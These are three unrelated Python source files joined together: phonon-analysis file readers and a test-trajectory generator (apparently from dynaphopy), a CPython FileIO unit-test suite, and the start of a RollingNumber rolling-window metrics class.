for i in range (number_of_atoms):
positions_fractional.append(file_map.readline().split()[0:number_of_dimensions])
positions_fractional = np.array(positions_fractional,dtype='double')
# Reading positions cartesian
position_number=file_map.find(b'position of ions in cartesian coordinates')
file_map.seek(position_number)
file_map.readline()
positions = []
for i in range (number_of_atoms):
positions.append(file_map.readline().split()[0:3])
positions = np.array(positions,dtype='double')
file_map.close()
return atomtest.Structure(cell= direct_cell,
positions=positions,
masses=atomic_mass,
)
def read_from_file_structure_poscar(file_name, number_of_dimensions=3):
# Check file exists
if not os.path.isfile(file_name):
print('Structure file does not exist!')
exit()
# Read from VASP POSCAR file
print("Reading VASP POSCAR structure")
poscar_file = open(file_name, 'r')
data_lines = poscar_file.read().split('\n')
poscar_file.close()
multiply = float(data_lines[1])
direct_cell = np.array([data_lines[i].split()
for i in range(2, 2+number_of_dimensions)], dtype=float)
direct_cell *= multiply
scaled_positions = None
positions = None
try:
number_of_types = np.array(data_lines[3+number_of_dimensions].split(),dtype=int)
coordinates_type = data_lines[4+number_of_dimensions][0]
if coordinates_type == 'D' or coordinates_type == 'd' :
scaled_positions = np.array([data_lines[8+k].split()[0:3]
for k in range(np.sum(number_of_types))],dtype=float)
else:
positions = np.array([data_lines[8+k].split()[0:3]
for k in range(np.sum(number_of_types))],dtype=float)
atomic_types = []
for i,j in enumerate(data_lines[5].split()):
atomic_types.append([j]*number_of_types[i])
atomic_types = [item for sublist in atomic_types for item in sublist]
# atomic_types = np.array(atomic_types).flatten().tolist()
# Old style POSCAR format
except ValueError:
print ("Reading old style POSCAR")
number_of_types = np.array(data_lines[5].split(), dtype=int)
coordinates_type = data_lines[6][0]
if coordinates_type == 'D' or coordinates_type == 'd':
scaled_positions = np.array([data_lines[7+k].split()[0:3]
for k in range(np.sum(number_of_types))], dtype=float)
else:
positions = np.array([data_lines[7+k].split()[0:3]
for k in range(np.sum(number_of_types))], dtype=float)
atomic_types = []
for i,j in enumerate(data_lines[0].split()):
atomic_types.append([j]*number_of_types[i])
atomic_types = [item for sublist in atomic_types for item in sublist]
# atomic_types = np.array(atomic_types).flatten().tolist()
return atomtest.Structure(cell=direct_cell, # cell_matrix, lattice vectors in rows
scaled_positions=scaled_positions,
positions=positions,
atomic_elements=atomic_types,
# primitive_cell=primitive_cell
)
# Just for testing (use with care) Generates a harmonic trajectory using the harmonic eigenvectors.
# All phonon are set to have the same phase defined by phase_0. The aplitude of each phonon mode is
# ajusted for all to have the same energy. This amplitude is given in temperature units assuming that
# phonon energy follows a Maxwell-Boltzmann distribution
def generate_test_trajectory(structure, supercell=(1, 1, 1),
minimum_frequency=0.1, # THz
total_time=2, # picoseconds
time_step=0.002, # picoseconds
temperature=400, # Kelvin
silent=False,
memmap=False,
phase_0=0.0):
import random
from dynaphopy.power_spectrum import _progress_bar
print('Generating ideal harmonic data for testing')
kb_boltzmann = 0.831446 # u * A^2 / ( ps^2 * K )
number_of_unit_cells_phonopy = np.prod(np.diag(structure.get_supercell_phonon()))
number_of_unit_cells = np.prod(supercell)
# atoms_relation = float(number_of_unit_cells)/ number_of_unit_cells_phonopy
# Recover dump trajectory from file (test only)
import pickle
if False:
dump_file = open( "trajectory.save", "r" )
trajectory = pickle.load(dump_file)
return trajectory
number_of_atoms = structure.get_number_of_cell_atoms()
number_of_primitive_atoms = structure.get_number_of_primitive_atoms()
number_of_dimensions = structure.get_number_of_dimensions()
positions = structure.get_positions(supercell=supercell)
masses = structure.get_masses(supercell=supercell)
number_of_atoms = number_of_atoms*number_of_unit_cells
number_of_primitive_cells = number_of_atoms/number_of_primitive_atoms
atom_type = structure.get_atom_type_index(supercell=supercell)
# Generate additional wave vectors sample
# structure.set_supercell_phonon_renormalized(np.diag(supercell))
q_vector_list = pho_interface.get_commensurate_points(structure, np.diag(supercell))
q_vector_list_cart = [ np.dot(q_vector, 2*np.pi*np.linalg.inv(structure.get_primitive_cell()).T)
for q_vector in q_vector_list]
atoms_relation = float(len(q_vector_list)*number_of_primitive_atoms)/number_of_atoms
# Generate frequencies and eigenvectors for the testing wave vector samples
print('Wave vectors included in test (commensurate points)')
eigenvectors_r = []
frequencies_r = []
for i in range(len(q_vector_list)):
print(q_vector_list[i])
eigenvectors, frequencies = pho_interface.obtain_eigenvectors_and_frequencies(structure, q_vector_list[i])
eigenvectors_r.append(eigenvectors)
frequencies_r.append(frequencies)
number_of_frequencies = len(frequencies_r[0])
# Generating trajectory
if not silent:
_progress_bar(0, 'generating')
# Generating trajectory
trajectory = []
for time in np.arange(total_time, step=time_step):
coordinates = np.array(positions[:, :], dtype=complex)
for i_freq in range(number_of_frequencies):
for i_long, q_vector in enumerate(q_vector_list_cart):
if abs(frequencies_r[i_long][i_freq]) > minimum_frequency: # Prevent error due to small frequencies
amplitude = np.sqrt(number_of_dimensions * kb_boltzmann * temperature / number_of_primitive_cells * atoms_relation)/(frequencies_r[i_long][i_freq] * 2 * np.pi) # + random.uniform(-1,1)*0.05
normal_mode = amplitude * np.exp(-1j * frequencies_r[i_long][i_freq] * 2.0 * np.pi * time)
phase = np.exp(1j * np.dot(q_vector, positions.T) + phase_0)
coordinates += (1.0 / np.sqrt(masses)[None].T *
eigenvectors_r[i_long][i_freq, atom_type] *
phase[None].T *
normal_mode).real
trajectory.append(coordinates)
if not silent:
_progress_bar(float(time + time_step) / total_time, 'generating', )
trajectory = np.array(trajectory)
time = np.array([i * time_step for i in range(trajectory.shape[0])], dtype=float)
energy = np.array([number_of_atoms * number_of_dimensions *
kb_boltzmann * temperature
for i in range(trajectory.shape[0])], dtype=float)
# Save a trajectory object to file for later recovery (test only)
if False:
dump_file = open("trajectory.save", "w")
pickle.dump(dyn.Dynamics(structure=structure,
trajectory=np.array(trajectory, dtype=complex),
energy=np.array(energy),
time=time,
supercell=np.dot(np.diagflat(supercell), structure.get_cell())),
dump_file)
dump_file.close()
# structure.set_supercell_phonon_renormalized(None)
return dyn.Dynamics(structure=structure,
trajectory=np.array(trajectory,dtype=complex),
energy=np.array(energy),
time=time,
supercell=np.dot(np.diagflat(supercell), structure.get_cell()),
memmap=memmap)
# Testing function
def read_from_file_test():
print('Reading structure from test file')
# Test conditions
number_of_dimensions = 2
f_coordinates = open('Data Files/test.out', 'r')
f_velocity = open('Data Files/test2.out', 'r')
f_trajectory = open('Data Files/test3.out', 'r')
# Coordinates reading
positions = []
while True:
row = f_coordinates.readline().split()
if not row: break
for i in range(len(row)): row[i] = float(row[i])
positions.append(row)
atom_type = np.array(positions,dtype=int)[:, 2]
positions = np.array(positions)[:,:number_of_dimensions]
print('Coordinates reading complete')
structure = atomtest.Structure(positions=positions,
atomic_numbers=atom_type,
cell=[[2,0],[0,1]],
masses=[1] * positions.shape[0]) #all 1
number_of_atoms = structure.get_number_of_atoms()
structure.set_number_of_primitive_atoms(2)
print('number of atoms in primitive cell')
print(structure.get_number_of_primitive_atoms())
print('number of total atoms in structure (super cell)')
print(number_of_atoms)
# Velocity reading section
velocity = []
while True:
row = f_velocity.readline().replace('I','j').replace('*','').replace('^','E').split()
if not row: break
for i in range(len(row)): row[i] = complex('('+row[i]+')')
velocity.append(row)
# Velocity = velocity[:4000][:] #Limitate the number of points (just for testing)
time = np.array([velocity[i][0] for i in range(len(velocity))]).real
velocity = np.array([[[velocity[i][j*number_of_dimensions+k+1]
for k in range(number_of_dimensions)]
for j in range(number_of_atoms)]
for i in range (len(velocity))])
print('Velocity reading complete')
# Trajectory reading
trajectory = []
while True:
row = f_trajectory.readline().replace('I','j').replace('*','').replace('^','E').split()
if not row: break
for i in range(len(row)): row[i] = complex('('+row[i]+')')
trajectory.append(row)
trajectory = np.array([[[trajectory[i][j*number_of_dimensions+k+1]
for k in range(number_of_dimensions)]
for j in range(number_of_atoms)]
for i in range (len(trajectory))])
print('Trajectory reading complete')
return dyn.Dynamics(trajectory=trajectory,
#velocity=velocity,
time=time,
structure=structure)
def write_curve_to_file(frequency_range, curve_matrix, file_name):
output_file = open(file_name, 'w')
for i in range(curve_matrix.shape[0]):
output_file.write("{0:10.4f}\t".format(frequency_range[i]))
for j in curve_matrix[i, :]:
output_file.write("{0:.10e}\t".format(j))
output_file.write("\n")
output_file.close()
return 0
def read_parameters_from_input_file(file_name, number_of_dimensions=3):
input_parameters = {'structure_file_name_poscar': 'POSCAR'}
# Check file exists
if not os.path.isfile(file_name):
print (file_name + ' file does not exist')
exit()
with open(file_name, "r") as f:
input_file = f.readlines()
for i, line in enumerate(input_file):
if line[0] == '#':
continue
if "STRUCTURE FILE OUTCAR" in line:
input_parameters.update({'structure_file_name_outcar': input_file[i+1].replace('\n','').strip()})
if "STRUCTURE FILE POSCAR" in line:
input_parameters.update({'structure_file_name_poscar': input_file[i+1].replace('\n','').strip()})
if "FORCE SETS" in line:
input_parameters.update({'force_sets_file_name': input_file[i+1].replace('\n','').strip()})
if "FORCE CONSTANTS" in line:
input_parameters.update({'force_constants_file_name': input_file[i+1].replace('\n','').strip()})
# print('Warning!: FORCE CONSTANTS label in input has changed. Please use FORCE SETS instead')
# exit()
if "PRIMITIVE MATRIX" in line:
primitive_matrix = [input_file[i+j+1].replace('\n','').split() for j in range(number_of_dimensions)]
input_parameters.update({'_primitive_matrix': np.array(primitive_matrix, dtype=float)})
if "SUPERCELL MATRIX" in line:
super_cell_matrix = [input_file[i+j+1].replace('\n','').split() for j in range(number_of_dimensions)]
super_cell_matrix = np.array(super_cell_matrix, dtype=int)
input_parameters.update({'supercell_phonon': np.array(super_cell_matrix, dtype=int)})
if "BANDS" in line:
bands = []
labels = []
while i < len(input_file)-1:
line = input_file[i + 1].replace('\n', '')
try:
labels.append(line.split(':')[1].replace('\n','').split(','))
line = line.split(':')[0]
except:
pass
try:
band = np.array(line.replace(',',' ').split(), dtype=float).reshape((2,3))
except IOError:
break
except ValueError:
break
i += 1
bands.append(band)
labels = [(label[0].replace(' ',''), label[1].replace(' ','')) for label in labels]
if labels != []:
input_parameters.update({'_band_ranges': {'ranges': bands,
'labels': labels}})
else:
input_parameters.update({'_band_ranges': {'ranges':bands}})
if "MESH PHONOPY" in line:
input_parameters.update({'_mesh_phonopy': np.array(input_file[i+1].replace('\n','').split(),dtype=int)})
return input_parameters
def write_xsf_file(file_name,structure):
xsf_file = open(file_name,"w")
xsf_file.write("CRYSTAL\n")
xsf_file.write("PRIMVEC\n")
for row in structure.get_primitive_cell():
xsf_file.write("{0:10.4f}\t{1:10.4f}\t{2:10.4f}\n".format(*row))
xsf_file.write("CONVVEC\n")
for row in structure.get_cell():
xsf_file.write("{0:10.4f}\t{1:10.4f}\t{2:10.4f}\n".format(*row))
xsf_file.write("PRIMCOORD\n")
xsf_file.write("{0:10d} {1:10d}\n".format(structure.get_number_of_primitive_atoms(),1))
counter = 0
while counter < structure.get_number_of_atom_types():
for i,value_type in enumerate(structure.get_atom_type_index()):
if value_type == counter:
xsf_file.write("{0:4d}\t{1:10.4f}\t{2:10.4f}\t{3:10.4f}\n".format(structure.get_atomic_numbers()[i],
*structure.get_positions()[i]))
counter += 1
break
xsf_file.close()
# Save & load HDF5 data file
def save_data_hdf5(file_name, time, super_cell, trajectory=None, velocity=None, vc=None, reduced_q_vector=None):
import h5py
hdf5_file = h5py.File(file_name, "w")
if trajectory is not None:
hdf5_file.create_dataset('trajectory', data=trajectory)
if velocity is not None:
hdf5_file.create_dataset('velocity', data=velocity)
if vc is not None:
hdf5_file.create_dataset('vc', data=vc)
if reduced_q_vector is not None:
hdf5_file.create_dataset('reduced_q_vector', data=reduced_q_vector)
hdf5_file.create_dataset('time', data=time)
hdf5_file.create_dataset('super_cell', data=super_cell)
# print("saved", velocity.shape[0], "steps")
hdf5_file.close()
def initialize_from_hdf5_file(file_name, structure, read_trajectory=True, initial_cut=1, final_cut=None, memmap=False):
import h5py
print("Reading data from hdf5 file: " + file_name)
trajectory = None
velocity = None
vc = None
reduced_q_vector = None
# Check file exists
if not os.path.isfile(file_name):
print(file_name + ' file does not exist!')
exit()
hdf5_file = h5py.File(file_name, "r")
if "trajectory" in hdf5_file and read_trajectory is True:
trajectory = hdf5_file['trajectory'][:]
if final_cut is not None:
trajectory = trajectory[initial_cut-1:final_cut]
else:
trajectory = trajectory[initial_cut-1:]
if "velocity" in hdf5_file:
velocity = hdf5_file['velocity'][:]
if final_cut is not None:
velocity = velocity[initial_cut-1:final_cut]
else:
velocity = velocity[initial_cut-1:]
if "vc" in hdf5_file:
vc = hdf5_file['vc'][:]
if final_cut is not None:
vc = vc[initial_cut-1:final_cut]
else:
vc = vc[initial_cut-1:]
if "reduced_q_vector" in hdf5_file:
reduced_q_vector = hdf5_file['reduced_q_vector'][:]
print("Load trajectory projected onto {0}".format(reduced_q_vector))
time = hdf5_file['time'][:]
supercell = hdf5_file['super_cell'][:]
hdf5_file.close()
if vc is None:
return dyn.Dynamics(structure=structure,
trajectory=trajectory,
velocity=velocity,
time=time,
supercell=np.dot(np.diagflat(supercell), structure.get_cell()),
memmap=memmap)
else:
return vc, reduced_q_vector, dyn.Dynamics(structure=structure,
time=time,
supercell=np.dot(np.diagflat(supercell), structure.get_cell()),
memmap=memmap)
def save_quasiparticle_data_to_file(quasiparticle_data, filename):
import yaml
def float_representer(dumper, value):
text = '{0:.8f}'.format(value)
return dumper.represent_scalar(u'tag:yaml.org,2002:float', text)
yaml.add_representer(float, float_representer)
output_dict = []
for i, q_point in enumerate(quasiparticle_data['q_points']):
q_point_dict = {'reduced_wave_vector': q_point.tolist()}
q_point_dict.update({'frequencies': quasiparticle_data['frequencies'][i].tolist()})
q_point_dict.update({'linewidths': quasiparticle_data['linewidths'][i].tolist()})
q_point_dict.update({'frequency_shifts': quasiparticle_data['frequency_shifts'][i].tolist()})
# output_dict.update({'q_point_{}'.format(i): q_point_dict})
output_dict.append(q_point_dict)
with open(filename, 'w') as outfile:
yaml.dump(output_dict, outfile, default_flow_style=False)
def save_mesh_data_to_yaml_file(mesh_data, filename):
import yaml
def float_representer(dumper, value):
text = '{0:.8f}'.format(value)
return dumper.represent_scalar(u'tag:yaml.org,2002:float', text)
yaml.add_representer(float, float_representer)
qpoints, multiplicity, frequencies, linewidths = mesh_data
output_dict = []
for i, qp in enumerate(qpoints):
mesh_dict = {}
mesh_dict['reduced_wave_vector'] = qp.tolist()
mesh_dict['frequencies'] = frequencies[i].tolist()
mesh_dict['linewidths'] = linewidths[i].tolist()
mesh_dict['multiplicity'] = int(multiplicity[i])
output_dict.append(mesh_dict)
with open(filename, 'w') as outfile:
yaml.dump(output_dict, outfile, default_flow_style=False)
def save_bands_data_to_file(bands_data, filename):
import yaml
def float_representer(dumper, value):
text = '{0:.8f}'.format(value)
return dumper.represent_scalar(u'tag:yaml.org,2002:float', text)
yaml.add_representer(float, float_representer)
with open(filename, 'w') as outfile:
yaml.dump(bands_data, outfile, default_flow_style=False)
|
|
# Adapted from test_file.py by Daniel Stutzbach
from __future__ import unicode_literals
import sys
import os
import errno
import unittest
from array import array
from weakref import proxy
from functools import wraps
from test.test_support import TESTFN, check_warnings, run_unittest, make_bad_fd
from test.test_support import py3k_bytes as bytes
from test.test_support import gc_collect
from test.script_helper import run_python
from _io import FileIO as _FileIO
class AutoFileTests(unittest.TestCase):
# file tests for which a test file is automatically set up
def setUp(self):
self.f = _FileIO(TESTFN, 'w')
def tearDown(self):
if self.f:
self.f.close()
os.remove(TESTFN)
def testWeakRefs(self):
# verify weak references
p = proxy(self.f)
p.write(bytes(range(10)))
self.assertEqual(self.f.tell(), p.tell())
self.f.close()
self.f = None
gc_collect()
self.assertRaises(ReferenceError, getattr, p, 'tell')
def testSeekTell(self):
self.f.write(bytes(range(20)))
self.assertEqual(self.f.tell(), 20)
self.f.seek(0)
self.assertEqual(self.f.tell(), 0)
self.f.seek(10)
self.assertEqual(self.f.tell(), 10)
self.f.seek(5, 1)
self.assertEqual(self.f.tell(), 15)
self.f.seek(-5, 1)
self.assertEqual(self.f.tell(), 10)
self.f.seek(-5, 2)
self.assertEqual(self.f.tell(), 15)
def testAttributes(self):
# verify expected attributes exist
f = self.f
self.assertEqual(f.mode, "wb")
self.assertEqual(f.closed, False)
# verify the attributes are readonly
for attr in 'mode', 'closed':
self.assertRaises((AttributeError, TypeError),
setattr, f, attr, 'oops')
def testReadinto(self):
# verify readinto
self.f.write(b"\x01\x02")
self.f.close()
a = array(b'b', b'x'*10)
self.f = _FileIO(TESTFN, 'r')
n = self.f.readinto(a)
self.assertEqual(array(b'b', [1, 2]), a[:n])
def test_none_args(self):
self.f.write(b"hi\nbye\nabc")
self.f.close()
self.f = _FileIO(TESTFN, 'r')
self.assertEqual(self.f.read(None), b"hi\nbye\nabc")
self.f.seek(0)
self.assertEqual(self.f.readline(None), b"hi\n")
self.assertEqual(self.f.readlines(None), [b"bye\n", b"abc"])
def testRepr(self):
self.assertEqual(repr(self.f), "<_io.FileIO name=%r mode='%s'>"
% (self.f.name, self.f.mode))
del self.f.name
self.assertEqual(repr(self.f), "<_io.FileIO fd=%r mode='%s'>"
% (self.f.fileno(), self.f.mode))
self.f.close()
self.assertEqual(repr(self.f), "<_io.FileIO [closed]>")
def testErrors(self):
f = self.f
self.assertTrue(not f.isatty())
self.assertTrue(not f.closed)
#self.assertEqual(f.name, TESTFN)
self.assertRaises(ValueError, f.read, 10) # Open for reading
f.close()
self.assertTrue(f.closed)
f = _FileIO(TESTFN, 'r')
self.assertRaises(TypeError, f.readinto, "")
self.assertTrue(not f.closed)
f.close()
self.assertTrue(f.closed)
def testMethods(self):
methods = ['fileno', 'isatty', 'read',
'tell', 'truncate', 'seekable',
'readable', 'writable']
if sys.platform.startswith('atheos'):
methods.remove('truncate')
self.f.close()
self.assertTrue(self.f.closed)
for methodname in methods:
method = getattr(self.f, methodname)
# should raise on closed file
self.assertRaises(ValueError, method)
# methods with one argument
self.assertRaises(ValueError, self.f.readinto, 0)
self.assertRaises(ValueError, self.f.write, 0)
self.assertRaises(ValueError, self.f.seek, 0)
def testOpendir(self):
# Issue 3703: opening a directory should fill the errno
# Windows always returns "[Errno 13]: Permission denied
# Unix calls dircheck() and returns "[Errno 21]: Is a directory"
try:
_FileIO('.', 'r')
except IOError as e:
self.assertNotEqual(e.errno, 0)
self.assertEqual(e.filename, ".")
else:
self.fail("Should have raised IOError")
#A set of functions testing that we get expected behaviour if someone has
#manually closed the internal file descriptor. First, a decorator:
def ClosedFD(func):
@wraps(func)
def wrapper(self):
#forcibly close the fd before invoking the problem function
f = self.f
os.close(f.fileno())
try:
func(self, f)
finally:
try:
self.f.close()
except IOError:
pass
return wrapper
def ClosedFDRaises(func):
@wraps(func)
def wrapper(self):
#forcibly close the fd before invoking the problem function
f = self.f
os.close(f.fileno())
try:
func(self, f)
except IOError as e:
self.assertEqual(e.errno, errno.EBADF)
else:
self.fail("Should have raised IOError")
finally:
try:
self.f.close()
except IOError:
pass
return wrapper
@ClosedFDRaises
def testErrnoOnClose(self, f):
f.close()
@ClosedFDRaises
def testErrnoOnClosedWrite(self, f):
f.write('a')
@ClosedFDRaises
def testErrnoOnClosedSeek(self, f):
f.seek(0)
@ClosedFDRaises
def testErrnoOnClosedTell(self, f):
f.tell()
@ClosedFDRaises
def testErrnoOnClosedTruncate(self, f):
f.truncate(0)
@ClosedFD
def testErrnoOnClosedSeekable(self, f):
f.seekable()
@ClosedFD
def testErrnoOnClosedReadable(self, f):
f.readable()
@ClosedFD
def testErrnoOnClosedWritable(self, f):
f.writable()
@ClosedFD
def testErrnoOnClosedFileno(self, f):
f.fileno()
@ClosedFD
def testErrnoOnClosedIsatty(self, f):
self.assertEqual(f.isatty(), False)
def ReopenForRead(self):
try:
self.f.close()
except IOError:
pass
self.f = _FileIO(TESTFN, 'r')
os.close(self.f.fileno())
return self.f
@ClosedFDRaises
def testErrnoOnClosedRead(self, f):
f = self.ReopenForRead()
f.read(1)
@ClosedFDRaises
def testErrnoOnClosedReadall(self, f):
f = self.ReopenForRead()
f.readall()
@ClosedFDRaises
def testErrnoOnClosedReadinto(self, f):
f = self.ReopenForRead()
a = array(b'b', b'x'*10)
f.readinto(a)
class OtherFileTests(unittest.TestCase):
def testAbles(self):
try:
f = _FileIO(TESTFN, "w")
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
f.close()
f = _FileIO(TESTFN, "r")
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
f.close()
f = _FileIO(TESTFN, "a+")
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.assertEqual(f.isatty(), False)
f.close()
if sys.platform != "win32":
try:
f = _FileIO("/dev/tty", "a")
except EnvironmentError:
# When run in a cron job there just aren't any
# ttys, so skip the test. This also handles other
# OS'es that don't support /dev/tty.
pass
else:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
if sys.platform != "darwin" and \
'bsd' not in sys.platform and \
not sys.platform.startswith('sunos'):
# Somehow /dev/tty appears seekable on some BSDs
self.assertEqual(f.seekable(), False)
self.assertEqual(f.isatty(), True)
f.close()
finally:
os.unlink(TESTFN)
def testModeStrings(self):
# check invalid mode strings
for mode in ("", "aU", "wU+", "rw", "rt"):
try:
f = _FileIO(TESTFN, mode)
except ValueError:
pass
else:
f.close()
self.fail('%r is an invalid file mode' % mode)
def testUnicodeOpen(self):
# verify repr works for unicode too
f = _FileIO(str(TESTFN), "w")
f.close()
os.unlink(TESTFN)
def testBytesOpen(self):
# Opening a bytes filename
try:
fn = TESTFN.encode("ascii")
except UnicodeEncodeError:
# Skip test
return
f = _FileIO(fn, "w")
try:
f.write(b"abc")
f.close()
with open(TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abc")
finally:
os.unlink(TESTFN)
def testInvalidFd(self):
self.assertRaises(ValueError, _FileIO, -10)
self.assertRaises(OSError, _FileIO, make_bad_fd())
if sys.platform == 'win32':
raise unittest.SkipTest('Set _invalid_parameter_handler for low level io')
import msvcrt
self.assertRaises(IOError, msvcrt.get_osfhandle, make_bad_fd())
def testBadModeArgument(self):
# verify that we get a sensible error message for bad mode argument
bad_mode = "qwerty"
try:
f = _FileIO(TESTFN, bad_mode)
except ValueError as msg:
if msg.args[0] != 0:
s = str(msg)
if TESTFN in s or bad_mode not in s:
self.fail("bad error message for invalid mode: %s" % s)
# if msg.args[0] == 0, we're probably on Windows where there may be
# no obvious way to discover why open() failed.
else:
f.close()
self.fail("no error for invalid mode: %s" % bad_mode)
def testTruncate(self):
f = _FileIO(TESTFN, 'w')
f.write(bytes(bytearray(range(10))))
self.assertEqual(f.tell(), 10)
f.truncate(5)
self.assertEqual(f.tell(), 10)
self.assertEqual(f.seek(0, os.SEEK_END), 5)
f.truncate(15)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.seek(0, os.SEEK_END), 15)
f.close()
def testTruncateOnWindows(self):
def bug801631():
# SF bug <http://www.python.org/sf/801631>
# "file.truncate fault on windows"
f = _FileIO(TESTFN, 'w')
f.write(bytes(range(11)))
f.close()
f = _FileIO(TESTFN,'r+')
data = f.read(5)
if data != bytes(range(5)):
self.fail("Read on file opened for update failed %r" % data)
if f.tell() != 5:
self.fail("File pos after read wrong %d" % f.tell())
f.truncate()
if f.tell() != 5:
self.fail("File pos after ftruncate wrong %d" % f.tell())
f.close()
size = os.path.getsize(TESTFN)
if size != 5:
self.fail("File size after ftruncate wrong %d" % size)
try:
bug801631()
finally:
os.unlink(TESTFN)
def testAppend(self):
try:
f = open(TESTFN, 'wb')
f.write(b'spam')
f.close()
f = open(TESTFN, 'ab')
f.write(b'eggs')
f.close()
f = open(TESTFN, 'rb')
d = f.read()
f.close()
self.assertEqual(d, b'spameggs')
finally:
try:
os.unlink(TESTFN)
except:
pass
def testInvalidInit(self):
self.assertRaises(TypeError, _FileIO, "1", 0, 0)
def testWarnings(self):
with check_warnings(quiet=True) as w:
self.assertEqual(w.warnings, [])
self.assertRaises(TypeError, _FileIO, [])
self.assertEqual(w.warnings, [])
self.assertRaises(ValueError, _FileIO, "/some/invalid/name", "rt")
self.assertEqual(w.warnings, [])
def test_surrogates(self):
# Issue #8438: try to open a filename containing surrogates.
# It should either fail because the file doesn't exist or the filename
# can't be represented using the filesystem encoding, but not because
# of a LookupError for the error handler "surrogateescape".
filename = u'\udc80.txt'
try:
with _FileIO(filename):
pass
except (UnicodeEncodeError, IOError):
pass
# Spawn a separate Python process with a different "file system
# default encoding", to exercise this further.
env = dict(os.environ)
env[b'LC_CTYPE'] = b'C'
_, out = run_python('-c', 'import _io; _io.FileIO(%r)' % filename, env=env)
if ('UnicodeEncodeError' not in out and
'IOError: [Errno 2] No such file or directory' not in out):
self.fail('Bad output: %r' % out)
def test_main():
# Historically, these tests have been sloppy about removing TESTFN.
# So get rid of it no matter what.
try:
run_unittest(AutoFileTests, OtherFileTests)
finally:
if os.path.exists(TESTFN):
os.unlink(TESTFN)
if __name__ == '__main__':
test_main()
|
|
from __future__ import absolute_import
from multiprocessing import Value, Lock, RLock
from collections import deque
import logging
import types
import time
import six
log = logging.getLogger(__name__)
class RollingNumber(object):
""" A **number** which can be used to track **counters** (increment) or set
values over time.
It is *rolling* in the sense that a :attr:`milliseconds` is
given that you want to track (such as 10 seconds) and then that is broken
into **buckets** (defaults to 10) so that the 10 second window doesn't
empty out and restart every 10 seconds, but instead every 1 second you
have a new :class:`Bucket` added and one dropped so that 9 of the buckets
remain and only the newest starts from scratch.
This is done so that the statistics are gathered over a *rolling* 10
second window with data being added/dropped in 1 second intervals
(or whatever granularity is defined by the arguments) rather than
each 10 second window starting at 0 again.
Performance-wise this class is optimized for writes, not reads. This is
done because it expects far higher write volume (thousands/second) than
reads (a few per second).
For example, on each read to getSum/getCount it will iterate buckets to
sum the data so that on writes we don't need to maintain the overall sum
and pay the synchronization cost at each write to ensure the sum is
up-to-date when the read can easily iterate each bucket to get the sum
when it needs it.
See test module :mod:`tests.test_rolling_number` for usage and expected
behavior examples.
"""
# TODO: Change _time to be optional(update all tests:( )
def __init__(self, _time, milliseconds, bucket_numbers):
self.time = _time
self.milliseconds = milliseconds
self.buckets = BucketCircular(bucket_numbers)
self.bucket_numbers = bucket_numbers
self.cumulative = CumulativeSum()
self._new_bucket_lock = RLock()
if self.milliseconds % self.bucket_numbers != 0:
raise Exception('The milliseconds must divide equally into '
'bucket_numbers. For example 1000/10 is ok, '
'1000/11 is not.')
def buckets_size_in_milliseconds(self):
return self.milliseconds / self.bucket_numbers
def increment(self, event):
""" Increment the **counter** in the current bucket by one for the
given :class:`RollingNumberEvent` type.
The :class:`RollingNumberEvent` must be a **counter** type
>>> RollingNumberEvent.isCounter()
True
Args:
event (:class:`RollingNumberEvent`): Event defining which
**counter** to increment.
"""
self.current_bucket().adder(event).increment()
def update_rolling_max(self, event, value):
""" Update a value and retain the max value.
The :class:`RollingNumberEvent` must be a **max updater** type
>>> RollingNumberEvent.isMaxUpdater()
True
Args:
value (int): Max value to update.
event (:class:`RollingNumberEvent`): Event defining which
**counter** to increment.
"""
self.current_bucket().max_updater(event).update(value)
def current_bucket(self):
""" Retrieve the current :class:`Bucket`
Retrieve the latest :class:`Bucket` if the given time is **BEFORE**
the end of the **bucket** window, otherwise it returns ``None``.
The following needs to be synchronized/locked even with a
synchronized/thread-safe data structure such as LinkedBlockingDeque
because the logic involves multiple steps to check existence,
create an object then insert the object. The 'check' or 'insertion'
themselves are thread-safe by themselves but not the aggregate
algorithm, thus we put this entire block of logic inside
synchronized.
I am using a :class:`multiprocessing.RLock` if/then
so that a single thread will get the lock and as soon as one thread
gets the lock all others will go the 'else' block and just return
the currentBucket until the newBucket is created. This should allow
the throughput to be far higher and only slow down 1 thread instead
of blocking all of them in each cycle of creating a new bucket based
on some testing (and it makes sense that it should as well).
This means the timing won't be exact to the millisecond as to what
data ends up in a bucket, but that's acceptable. It's not critical
to have exact precision to the millisecond, as long as it's rolling,
if we can instead reduce the impact synchronization.
More importantly though it means that the 'if' block within the
lock needs to be careful about what it changes that can still
be accessed concurrently in the 'else' block since we're not
completely synchronizing access.
For example, we can't have a multi-step process to add a bucket,
remove a bucket, then update the sum since the 'else' block of code
can retrieve the sum while this is all happening. The trade-off is
that we don't maintain the rolling sum and let readers just iterate
bucket to calculate the sum themselves. This is an example of
favoring write-performance instead of read-performance and how the
tryLock versus a synchronized block needs to be accommodated.
Returns:
bucket: Returns the latest :class:`Bucket` or ``None``.
"""
# TODO: Check the doc string above^.
current_time = self.time.current_time_in_millis()
# a shortcut to try and get the most common result of immediately
# finding the current bucket
current_bucket = self.buckets.peek_last()
if current_bucket is not None and current_time < (current_bucket.window_start + self.buckets_size_in_milliseconds()):
return current_bucket
with self._new_bucket_lock:
# If we didn't find the current bucket above, then we have to
# create one.
if self.buckets.peek_last() is None:
new_bucket = Bucket(current_time)
self.buckets.add_last(new_bucket)
return new_bucket
else:
for i in range(self.bucket_numbers):
last_bucket = self.buckets.peek_last()
if current_time < (last_bucket.window_start + self.buckets_size_in_milliseconds()):
return last_bucket
elif current_time - (last_bucket.window_start + self.buckets_size_in_milliseconds()) > self.milliseconds:
self.reset()
return self.current_bucket()
else:
self.buckets.add_last(Bucket(last_bucket.window_start + self.buckets_size_in_milliseconds()))
self.cumulative.add_bucket(last_bucket)
return self.buckets.peek_last()
# we didn't get the lock so just return the latest bucket while
# another thread creates the next one
current_bucket = self.buckets.peek_last()
if current_bucket is not None:
return current_bucket
else:
# The rare scenario where multiple threads raced to create the
# very first bucket wait slightly and then use recursion while
# the other thread finishes creating a bucket
time.sleep(5)
self.current_bucket()
def reset(self):
""" Reset all rolling **counters**
Force a reset of all rolling **counters** (clear all **buckets**) so
that statistics start being gathered from scratch.
This does NOT reset the :class:`CumulativeSum` values.
"""
